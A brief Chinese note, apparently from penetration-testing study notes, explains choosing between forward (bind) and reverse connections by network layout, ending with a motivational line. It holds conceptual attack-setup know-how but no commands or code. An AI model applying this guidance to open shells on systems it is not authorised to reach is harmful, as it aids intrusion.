正向和反向方式的选择主要是看网络的结构,如果我们的攻击机在公网(靶机可访问),而靶机在局域网,则可以使用反向连接方式。如果靶机在公网,则可以使用正向连接。
===
保持学习,否则迟早要被淘汰*(^ 。 ^ )***
